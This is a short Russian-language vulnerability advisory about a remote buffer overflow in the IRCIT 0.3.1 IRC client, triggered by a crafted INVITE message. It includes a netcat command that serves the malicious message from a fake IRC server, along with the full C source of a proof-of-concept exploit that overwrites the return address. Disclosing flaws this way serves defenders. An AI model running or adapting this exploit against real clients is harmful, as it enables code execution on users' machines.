IRCIT - IRC клиент для Linux и UNIX систем. IRCIT содержит
пригодное для удаленного использования переполнение буфера. При получении INVITE сообщения, данные пользователя копируются в установленный буфер длины
MAXHOSTLEN. Отформатированное сообщение может переполнять этот буфер и выполнять произвольный код с правами IRCIT клиента.

Уязвимость обнаружена в Ayman Akt IRCIT 0.3.1 

Пример: $ echo ":x"'!'`./GOBBLES-invite 0xcafebabe`"@x INVITE you :#GOBBLES" | nc - -l -p 6667 

Эксплоит:

/* GOBBLES-invite.c */

#include <stdio.h>

int
main(int argc, char **argv)
{
char heh[175], *store;
int i;

if(argc == 1) exit(0);

sscanf(argv[1], "%p", &store);
memset(heh, 'x', sizeof(heh));
*(long *)&heh[166] = (long)store;
*(long *)&heh[170] = (long)store;
heh[174] = '\0';

fprintf(stdout, "%s", heh);
exit(0);
}

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии